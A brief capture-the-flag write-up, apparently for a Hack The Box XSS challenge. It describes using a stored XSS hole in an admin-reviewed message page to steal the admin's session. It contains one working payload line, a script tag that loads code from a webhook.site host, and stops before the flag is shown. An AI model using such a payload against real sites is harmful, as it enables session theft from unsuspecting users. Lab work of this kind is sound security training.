After logging, there is a page where you can write something for the admin to review.
This page is vulnerable to XSS.
An admin is checking every request. We can get his session by using XSS.
A nice writeup:
https://systemweakness.com/solving-the-xss-htb-ctf-challenge-5c4d5fb9e1b2
<script src=" https://webhook.site/[your website]"></script>
After sending some requests, one of them had the flag:
